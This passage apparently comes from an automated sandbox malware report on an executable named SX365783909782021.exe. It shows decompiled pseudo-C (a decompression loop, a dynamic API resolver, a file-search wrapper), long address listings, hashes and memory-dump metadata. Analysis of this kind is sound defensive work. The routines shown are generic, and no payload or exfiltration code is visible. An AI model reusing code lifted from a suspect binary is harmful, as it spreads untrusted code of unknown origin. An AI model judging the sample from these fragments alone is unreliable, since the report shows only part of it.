									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                                        0x00000000
                                                                                        0x00406131
                                                                                        0x00406131
                                                                                        0x00406136
                                                                                        0x004061ad
                                                                                        0x004061b4
                                                                                        0x004061be
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x004067a0
                                                                                        0x004067a0
                                                                                        0x004067a6
                                                                                        0x004067ac
                                                                                        0x004067b2
                                                                                        0x004067cc
                                                                                        0x004067cf
                                                                                        0x004067d5
                                                                                        0x004067e0
                                                                                        0x004067e2
                                                                                        0x004067b4
                                                                                        0x004067b4
                                                                                        0x004067c3
                                                                                        0x004067c7
                                                                                        0x004067c7
                                                                                        0x004067ec
                                                                                        0x00406813
                                                                                        0x00406813
                                                                                        0x00406819
                                                                                        0x00406819
                                                                                        0x00000000
                                                                                        0x004067ee
                                                                                        0x004067ee
                                                                                        0x004067f2
                                                                                        0x004069a1
                                                                                        0x00000000
                                                                                        0x004069a1
                                                                                        0x004067fe
                                                                                        0x00406805
                                                                                        0x0040680d
                                                                                        0x00406810
                                                                                        0x00000000
                                                                                        0x00406810
                                                                                        0x00406138
                                                                                        0x00406138
                                                                                        0x0040613c
                                                                                        0x00406144
                                                                                        0x00406147
                                                                                        0x00406149
                                                                                        0x0040614c
                                                                                        0x0040614e
                                                                                        0x00406153
                                                                                        0x00406156
                                                                                        0x0040615d
                                                                                        0x00406164
                                                                                        0x00406167
                                                                                        0x00406172
                                                                                        0x0040617a
                                                                                        0x0040617a
                                                                                        0x00406174
                                                                                        0x00406174
                                                                                        0x00406174
                                                                                        0x00406169
                                                                                        0x00406169
                                                                                        0x00406169
                                                                                        0x00406181
                                                                                        0x0040619f
                                                                                        0x004061a1
                                                                                        0x00406374
                                                                                        0x00406374
                                                                                        0x00406377
                                                                                        0x0040637a
                                                                                        0x0040637d
                                                                                        0x00406380
                                                                                        0x00406383
                                                                                        0x00406386
                                                                                        0x00406389
                                                                                        0x0040638c
                                                                                        0x00406392
                                                                                        0x004063aa
                                                                                        0x004063ad
                                                                                        0x004063b0
                                                                                        0x004063b3
                                                                                        0x004063b3
                                                                                        0x004063b6
                                                                                        0x004063bc
                                                                                        0x00406394
                                                                                        0x00406394
                                                                                        0x0040639c
                                                                                        0x004063a1
                                                                                        0x004063a3
                                                                                        0x004063a5
                                                                                        0x004063a5
                                                                                        0x004063c6
                                                                                        0x004063c9
                                                                                        0x0040636c
                                                                                        0x00406372
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004063cb
                                                                                        0x00406347
                                                                                        0x0040634b
                                                                                        0x00406953
                                                                                        0x00000000
                                                                                        0x00406953
                                                                                        0x00406351
                                                                                        0x00406354
                                                                                        0x00406357
                                                                                        0x0040635b
                                                                                        0x0040635e
                                                                                        0x00406364
                                                                                        0x00406366
                                                                                        0x00406366
                                                                                        0x00406369
                                                                                        0x00000000
                                                                                        0x00406369
                                                                                        0x00406183
                                                                                        0x00406183
                                                                                        0x00406186
                                                                                        0x0040618c
                                                                                        0x0040618e
                                                                                        0x0040618e
                                                                                        0x00406191
                                                                                        0x00406194
                                                                                        0x00406196
                                                                                        0x00406197
                                                                                        0x0040619a
                                                                                        0x00406207
                                                                                        0x00406207
                                                                                        0x0040620b
                                                                                        0x0040620e
                                                                                        0x00406211
                                                                                        0x00406214
                                                                                        0x00406217
                                                                                        0x00406218
                                                                                        0x0040621b
                                                                                        0x0040621d
                                                                                        0x00406223
                                                                                        0x00406226
                                                                                        0x00406229
                                                                                        0x0040622c
                                                                                        0x0040622f
                                                                                        0x00406235
                                                                                        0x00406251
                                                                                        0x00406254
                                                                                        0x00406257
                                                                                        0x0040625a
                                                                                        0x00406261
                                                                                        0x00406267
                                                                                        0x0040626b
                                                                                        0x00406237
                                                                                        0x00406237
                                                                                        0x0040623b
                                                                                        0x00406243
                                                                                        0x00406248
                                                                                        0x0040624a
                                                                                        0x0040624c
                                                                                        0x0040624c
                                                                                        0x00406275
                                                                                        0x00406278
                                                                                        0x004061ef
                                                                                        0x004061ef
                                                                                        0x004061f5
                                                                                        0x004062a8
                                                                                        0x004062ae
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004062b0
                                                                                        0x004062b3
                                                                                        0x004062b6
                                                                                        0x004062b9
                                                                                        0x004062bc
                                                                                        0x004062bf
                                                                                        0x004062c2
                                                                                        0x004062c5
                                                                                        0x004062c8
                                                                                        0x004062ce
                                                                                        0x004062e6
                                                                                        0x004062e9
                                                                                        0x004062ec
                                                                                        0x004062ef
                                                                                        0x004062ef
                                                                                        0x004062f2
                                                                                        0x004062f8
                                                                                        0x004062d0
                                                                                        0x004062d0
                                                                                        0x004062d8
                                                                                        0x004062dd
                                                                                        0x004062df
                                                                                        0x004062e1
                                                                                        0x004062e1
                                                                                        0x00406302
                                                                                        0x00406305
                                                                                        0x00406283
                                                                                        0x00406287
                                                                                        0x00406947
                                                                                        0x00000000
                                                                                        0x00406947
                                                                                        0x0040628d
                                                                                        0x00406290
                                                                                        0x00406293
                                                                                        0x00406297
                                                                                        0x0040629a
                                                                                        0x004062a0
                                                                                        0x004062a2
                                                                                        0x004062a2
                                                                                        0x004062a5
                                                                                        0x004062a5
                                                                                        0x00406305
                                                                                        0x0040630c
                                                                                        0x0040630c
                                                                                        0x0040630c
                                                                                        0x00406310
                                                                                        0x00406310
                                                                                        0x00406313
                                                                                        0x00406316
                                                                                        0x0040631a
                                                                                        0x0040695f
                                                                                        0x00000000
                                                                                        0x0040695f
                                                                                        0x00406320
                                                                                        0x00406323
                                                                                        0x00406326
                                                                                        0x00406329
                                                                                        0x0040632c
                                                                                        0x0040632f
                                                                                        0x00406332
                                                                                        0x00406334
                                                                                        0x00406337
                                                                                        0x0040633a
                                                                                        0x0040633d
                                                                                        0x0040633f
                                                                                        0x0040633f
                                                                                        0x0040633f
                                                                                        0x004064dc
                                                                                        0x004064dc
                                                                                        0x004064df
                                                                                        0x004064df
                                                                                        0x00000000
                                                                                        0x004064df
                                                                                        0x00406201
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040627e
                                                                                        0x004061ca
                                                                                        0x004061ce
                                                                                        0x0040693b
                                                                                        0x004069b7
                                                                                        0x004069bf
                                                                                        0x004069c6
                                                                                        0x004069c8
                                                                                        0x004069cf
                                                                                        0x004069d3
                                                                                        0x004069d3
                                                                                        0x004061d4
                                                                                        0x004061d7
                                                                                        0x004061da
                                                                                        0x004061de
                                                                                        0x004061e1
                                                                                        0x004061e7
                                                                                        0x004061e9
                                                                                        0x004061e9
                                                                                        0x004061ec
                                                                                        0x00000000
                                                                                        0x004061ec
                                                                                        0x00406278
                                                                                        0x00406181
                                                                                        0x00405fb5
                                                                                        0x00405fb5
                                                                                        0x00405fbe
                                                                                        0x004069cc
                                                                                        0x004069cc
                                                                                        0x00000000
                                                                                        0x004069cc
                                                                                        0x00405fc4
                                                                                        0x00000000
                                                                                        0x00405fcf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405fd8
                                                                                        0x00405fdb
                                                                                        0x00405fde
                                                                                        0x00405fe2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405fe8
                                                                                        0x00405feb
                                                                                        0x00405fed
                                                                                        0x00405fee
                                                                                        0x00405ff1
                                                                                        0x00405ff3
                                                                                        0x00405ff4
                                                                                        0x00405ff6
                                                                                        0x00405ff9
                                                                                        0x00405ffe
                                                                                        0x00406003
                                                                                        0x0040600c
                                                                                        0x0040601f
                                                                                        0x00406022
                                                                                        0x0040602e
                                                                                        0x00406056
                                                                                        0x00406058
                                                                                        0x00406066
                                                                                        0x00406066
                                                                                        0x0040606a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040605a
                                                                                        0x0040605a
                                                                                        0x0040605d
                                                                                        0x0040605e
                                                                                        0x0040605e
                                                                                        0x00000000
                                                                                        0x0040605a
                                                                                        0x00406034
                                                                                        0x00406039
                                                                                        0x00406039
                                                                                        0x00406042
                                                                                        0x0040604a
                                                                                        0x0040604d
                                                                                        0x00000000
                                                                                        0x00406053
                                                                                        0x00406053
                                                                                        0x00000000
                                                                                        0x00406053
                                                                                        0x00000000
                                                                                        0x00406070
                                                                                        0x00406070
                                                                                        0x00406074
                                                                                        0x00406920
                                                                                        0x00000000
                                                                                        0x00406920
                                                                                        0x0040607d
                                                                                        0x0040608d
                                                                                        0x00406090
                                                                                        0x00406093
                                                                                        0x00406093
                                                                                        0x00406093
                                                                                        0x00406096
                                                                                        0x0040609a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040609c
                                                                                        0x004060a2
                                                                                        0x004060cc
                                                                                        0x004060d2
                                                                                        0x004060d9
                                                                                        0x00000000
                                                                                        0x004060d9
                                                                                        0x004060a8
                                                                                        0x004060ab
                                                                                        0x004060b0
                                                                                        0x004060b0
                                                                                        0x004060bb
                                                                                        0x004060c3
                                                                                        0x004060c6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040610b
                                                                                        0x00406111
                                                                                        0x00406114
                                                                                        0x00406121
                                                                                        0x00406129
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004060e0
                                                                                        0x004060e0
                                                                                        0x004060e4
                                                                                        0x0040692f
                                                                                        0x00000000
                                                                                        0x0040692f
                                                                                        0x004060f0
                                                                                        0x004060fb
                                                                                        0x004060fb
                                                                                        0x004060fb
                                                                                        0x004060fe
                                                                                        0x00406101
                                                                                        0x00406104
                                                                                        0x00406109
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004063d0
                                                                                        0x004063d4
                                                                                        0x004063f2
                                                                                        0x004063f5
                                                                                        0x004063fc
                                                                                        0x004063ff
                                                                                        0x00406402
                                                                                        0x00406405
                                                                                        0x00406408
                                                                                        0x0040640b
                                                                                        0x0040640d
                                                                                        0x00406414
                                                                                        0x00406415
                                                                                        0x00406417
                                                                                        0x0040641a
                                                                                        0x0040641d
                                                                                        0x00406420
                                                                                        0x00406420
                                                                                        0x00406425
                                                                                        0x00000000
                                                                                        0x00406425
                                                                                        0x004063d6
                                                                                        0x004063d9
                                                                                        0x004063dc
                                                                                        0x004063e6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040643a
                                                                                        0x0040643e
                                                                                        0x00406461
                                                                                        0x00406464
                                                                                        0x00406467
                                                                                        0x00406471
                                                                                        0x00406440
                                                                                        0x00406440
                                                                                        0x00406443
                                                                                        0x00406446
                                                                                        0x00406449
                                                                                        0x00406456
                                                                                        0x00406459
                                                                                        0x00406459
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040647d
                                                                                        0x00406481
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406487
                                                                                        0x0040648b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406491
                                                                                        0x00406493
                                                                                        0x00406497
                                                                                        0x00406497
                                                                                        0x0040649a
                                                                                        0x0040649e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004064ee
                                                                                        0x004064f2
                                                                                        0x004064f9
                                                                                        0x004064fc
                                                                                        0x004064ff
                                                                                        0x00406509
                                                                                        0x00000000
                                                                                        0x00406509
                                                                                        0x004064f4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406515
                                                                                        0x00406519
                                                                                        0x00406520
                                                                                        0x00406523
                                                                                        0x00406526
                                                                                        0x0040651b
                                                                                        0x0040651b
                                                                                        0x0040651b
                                                                                        0x00406529
                                                                                        0x0040652c
                                                                                        0x0040652f
                                                                                        0x0040652f
                                                                                        0x00406532
                                                                                        0x00406535
                                                                                        0x00406538
                                                                                        0x00406538
                                                                                        0x0040653b
                                                                                        0x00406542
                                                                                        0x00406547
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004065d5
                                                                                        0x004065d5
                                                                                        0x004065d9
                                                                                        0x00406977
                                                                                        0x00000000
                                                                                        0x00406977
                                                                                        0x004065df
                                                                                        0x004065e2
                                                                                        0x004065e5
                                                                                        0x004065e9
                                                                                        0x004065ec
                                                                                        0x004065f2
                                                                                        0x004065f4
                                                                                        0x004065f4
                                                                                        0x004065f4
                                                                                        0x004065f7
                                                                                        0x004065fa
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406658
                                                                                        0x00406658
                                                                                        0x0040665c
                                                                                        0x00406983
                                                                                        0x00000000
                                                                                        0x00406983
                                                                                        0x00406662
                                                                                        0x00406665
                                                                                        0x00406668
                                                                                        0x0040666c
                                                                                        0x0040666f
                                                                                        0x00406675
                                                                                        0x00406677
                                                                                        0x00406677
                                                                                        0x00406677
                                                                                        0x0040667a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406428
                                                                                        0x00406428
                                                                                        0x0040642b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406767
                                                                                        0x0040676b
                                                                                        0x0040678d
                                                                                        0x00406790
                                                                                        0x0040679a
                                                                                        0x00000000
                                                                                        0x0040679a
                                                                                        0x0040676d
                                                                                        0x00406770
                                                                                        0x00406774
                                                                                        0x00406777
                                                                                        0x00406777
                                                                                        0x0040677a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406824
                                                                                        0x00406828
                                                                                        0x00406846
                                                                                        0x00406846
                                                                                        0x00406846
                                                                                        0x0040684d
                                                                                        0x00406854
                                                                                        0x0040685b
                                                                                        0x0040685b
                                                                                        0x00000000
                                                                                        0x0040685b
                                                                                        0x0040682a
                                                                                        0x0040682d
                                                                                        0x00406830
                                                                                        0x00406833
                                                                                        0x0040683a
                                                                                        0x0040677e
                                                                                        0x0040677e
                                                                                        0x00406781
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406915
                                                                                        0x00406918
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040654f
                                                                                        0x00406551
                                                                                        0x00406558
                                                                                        0x00406559
                                                                                        0x0040655b
                                                                                        0x0040655e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406566
                                                                                        0x00406569
                                                                                        0x0040656c
                                                                                        0x0040656e
                                                                                        0x00406570
                                                                                        0x00406570
                                                                                        0x00406571
                                                                                        0x00406574
                                                                                        0x0040657b
                                                                                        0x0040657e
                                                                                        0x0040658c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406862
                                                                                        0x00406862
                                                                                        0x00406865
                                                                                        0x0040686c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406871
                                                                                        0x00406871
                                                                                        0x00406875
                                                                                        0x004069ad
                                                                                        0x00000000
                                                                                        0x004069ad
                                                                                        0x0040687b
                                                                                        0x0040687e
                                                                                        0x00406881
                                                                                        0x00406885
                                                                                        0x00406888
                                                                                        0x0040688e
                                                                                        0x00406890
                                                                                        0x00406890
                                                                                        0x00406890
                                                                                        0x00406893
                                                                                        0x00406896
                                                                                        0x00406896
                                                                                        0x00406896
                                                                                        0x00406896
                                                                                        0x00406899
                                                                                        0x00406899
                                                                                        0x0040689d
                                                                                        0x004068fd
                                                                                        0x00406900
                                                                                        0x00406905
                                                                                        0x00406906
                                                                                        0x00406908
                                                                                        0x0040690a
                                                                                        0x0040690d
                                                                                        0x00000000
                                                                                        0x0040690d
                                                                                        0x0040689f
                                                                                        0x004068a5
                                                                                        0x004068a8
                                                                                        0x004068ab
                                                                                        0x004068ae
                                                                                        0x004068b1
                                                                                        0x004068b4
                                                                                        0x004068b7
                                                                                        0x004068ba
                                                                                        0x004068bd
                                                                                        0x004068c0
                                                                                        0x004068d9
                                                                                        0x004068dc
                                                                                        0x004068df
                                                                                        0x004068e2
                                                                                        0x004068e6
                                                                                        0x004068e8
                                                                                        0x004068e8
                                                                                        0x004068e9
                                                                                        0x004068ec
                                                                                        0x004068c2
                                                                                        0x004068c2
                                                                                        0x004068ca
                                                                                        0x004068cf
                                                                                        0x004068d1
                                                                                        0x004068d4
                                                                                        0x004068d4
                                                                                        0x004068ef
                                                                                        0x004068f6
                                                                                        0x00000000
                                                                                        0x004068f8
                                                                                        0x00000000
                                                                                        0x004068f8
                                                                                        0x00000000
                                                                                        0x00406594
                                                                                        0x00406597
                                                                                        0x004065cd
                                                                                        0x004066fd
                                                                                        0x004066fd
                                                                                        0x004066fd
                                                                                        0x004066fd
                                                                                        0x00406700
                                                                                        0x00406700
                                                                                        0x00406703
                                                                                        0x00406705
                                                                                        0x0040698f
                                                                                        0x00000000
                                                                                        0x0040698f
                                                                                        0x0040670b
                                                                                        0x0040670e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406714
                                                                                        0x00406718
                                                                                        0x0040671b
                                                                                        0x0040671b
                                                                                        0x0040671b
                                                                                        0x00000000
                                                                                        0x0040671b
                                                                                        0x00406599
                                                                                        0x0040659b
                                                                                        0x0040659d
                                                                                        0x0040659f
                                                                                        0x004065a2
                                                                                        0x004065a3
                                                                                        0x004065a5
                                                                                        0x004065a7
                                                                                        0x004065aa
                                                                                        0x004065ad
                                                                                        0x004065c3
                                                                                        0x004065c8
                                                                                        0x00406600
                                                                                        0x00406600
                                                                                        0x00406604
                                                                                        0x00406630
                                                                                        0x00406632
                                                                                        0x00406639
                                                                                        0x0040663c
                                                                                        0x0040663f
                                                                                        0x0040663f
                                                                                        0x00406644
                                                                                        0x00406644
                                                                                        0x00406646
                                                                                        0x00406649
                                                                                        0x00406650
                                                                                        0x00406653
                                                                                        0x00406680
                                                                                        0x00406680
                                                                                        0x00406683
                                                                                        0x00406686
                                                                                        0x004066fa
                                                                                        0x004066fa
                                                                                        0x004066fa
                                                                                        0x00000000
                                                                                        0x004066fa
                                                                                        0x00406688
                                                                                        0x0040668e
                                                                                        0x00406691
                                                                                        0x00406694
                                                                                        0x00406697
                                                                                        0x0040669a
                                                                                        0x0040669d
                                                                                        0x004066a0
                                                                                        0x004066a3
                                                                                        0x004066a6
                                                                                        0x004066a9
                                                                                        0x004066c2
                                                                                        0x004066c4
                                                                                        0x004066c7
                                                                                        0x004066c8
                                                                                        0x004066cb
                                                                                        0x004066cd
                                                                                        0x004066d0
                                                                                        0x004066d2
                                                                                        0x004066d4
                                                                                        0x004066d7
                                                                                        0x004066d9
                                                                                        0x004066dc
                                                                                        0x004066e0
                                                                                        0x004066e2
                                                                                        0x004066e2
                                                                                        0x004066e3
                                                                                        0x004066e6
                                                                                        0x004066e9
                                                                                        0x004066ab
                                                                                        0x004066ab
                                                                                        0x004066b3
                                                                                        0x004066b8
                                                                                        0x004066ba
                                                                                        0x004066bd
                                                                                        0x004066bd
                                                                                        0x004066ec
                                                                                        0x004066f3
                                                                                        0x0040667d
                                                                                        0x0040667d
                                                                                        0x0040667d
                                                                                        0x0040667d
                                                                                        0x00000000
                                                                                        0x004066f5
                                                                                        0x00000000
                                                                                        0x004066f5
                                                                                        0x004066f3
                                                                                        0x00406606
                                                                                        0x00406609
                                                                                        0x0040660b
                                                                                        0x0040660e
                                                                                        0x00406611
                                                                                        0x00406614
                                                                                        0x00406616
                                                                                        0x00406619
                                                                                        0x0040661c
                                                                                        0x0040661c
                                                                                        0x0040661f
                                                                                        0x0040661f
                                                                                        0x00406622
                                                                                        0x00406629
                                                                                        0x004065fd
                                                                                        0x004065fd
                                                                                        0x004065fd
                                                                                        0x004065fd
                                                                                        0x00000000
                                                                                        0x0040662b
                                                                                        0x00000000
                                                                                        0x0040662b
                                                                                        0x00406629
                                                                                        0x004065af
                                                                                        0x004065b2
                                                                                        0x004065b4
                                                                                        0x004065b7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004064a1
                                                                                        0x004064a1
                                                                                        0x004064a5
                                                                                        0x0040696b
                                                                                        0x00000000
                                                                                        0x0040696b
                                                                                        0x004064ab
                                                                                        0x004064ae
                                                                                        0x004064b1
                                                                                        0x004064b4
                                                                                        0x004064b6
                                                                                        0x004064b6
                                                                                        0x004064b6
                                                                                        0x004064b9
                                                                                        0x004064bc
                                                                                        0x004064bf
                                                                                        0x004064c2
                                                                                        0x004064c5
                                                                                        0x004064c8
                                                                                        0x004064c9
                                                                                        0x004064cb
                                                                                        0x004064cb
                                                                                        0x004064cb
                                                                                        0x004064ce
                                                                                        0x004064d1
                                                                                        0x004064d4
                                                                                        0x004064d7
                                                                                        0x004064d7
                                                                                        0x004064d7
                                                                                        0x004064da
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040671e
                                                                                        0x0040671e
                                                                                        0x0040671e
                                                                                        0x00406722
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406728
                                                                                        0x0040672b
                                                                                        0x0040672e
                                                                                        0x00406731
                                                                                        0x00406733
                                                                                        0x00406733
                                                                                        0x00406733
                                                                                        0x00406736
                                                                                        0x00406739
                                                                                        0x0040673c
                                                                                        0x0040673f
                                                                                        0x00406742
                                                                                        0x00406745
                                                                                        0x00406746
                                                                                        0x00406748
                                                                                        0x00406748
                                                                                        0x00406748
                                                                                        0x0040674b
                                                                                        0x0040674e
                                                                                        0x00406751
                                                                                        0x00406754
                                                                                        0x00406757
                                                                                        0x0040675b
                                                                                        0x0040675d
                                                                                        0x00406760
                                                                                        0x00000000
                                                                                        0x00406762
                                                                                        0x00000000
                                                                                        0x00406762
                                                                                        0x00406760
                                                                                        0x00406995
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405fc4

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d33a5f9df5361017a2c2cd63e74982cac3414c6cd2676332625b738f25334a08
                                                                                        • Instruction ID: 7fe690cacb8e5da35aefc448adc87e2f65dc6f56ff44dc44b78e187fa59068bd
                                                                                        • Opcode Fuzzy Hash: d33a5f9df5361017a2c2cd63e74982cac3414c6cd2676332625b738f25334a08
                                                                                        • Instruction Fuzzy Hash: 70F16871D00229CBDF28CFA8C8946ADBBB1FF44305F25816ED856BB281D7785A96CF44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405E88, Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00405E88(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409220);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x409224));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}






                                                                                        0x00405e90
                                                                                        0x00405e93
                                                                                        0x00405e9a
                                                                                        0x00405ea2
                                                                                        0x00405eaf
                                                                                        0x00000000
                                                                                        0x00405eb6
                                                                                        0x00405ea5
                                                                                        0x00405ead
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405ebe

                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                        • LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                                                        • String ID:
                                                                                        • API String ID: 310444273-0
                                                                                        • Opcode ID: cda0668070076e7cac62d6abfc32be1e4fdfe709f191786036c768239460f4b3
                                                                                        • Instruction ID: 91087f9554edebef2dfdad95906e97f440013226b38390424b9c6ad62026e406
                                                                                        • Opcode Fuzzy Hash: cda0668070076e7cac62d6abfc32be1e4fdfe709f191786036c768239460f4b3
                                                                                        • Instruction Fuzzy Hash: 0FE08C32A08511BBD3115B30ED0896B77A8EA89B41304083EF959F6290D734EC119BFA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405E61, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00405E61(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4224f0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4224f0;
			}




                                                                                        0x00405e6c
                                                                                        0x00405e75
                                                                                        0x00000000
                                                                                        0x00405e82
                                                                                        0x00405e78
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • FindFirstFileA.KERNELBASE(?,004224F0,004218A8,0040577D,004218A8,004218A8,00000000,004218A8,004218A8,?,?,74B5F560,0040549F,?,"C:\Users\user\Desktop\SX365783909782021.exe" ,74B5F560), ref: 00405E6C
                                                                                        • FindClose.KERNEL32(00000000), ref: 00405E78
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
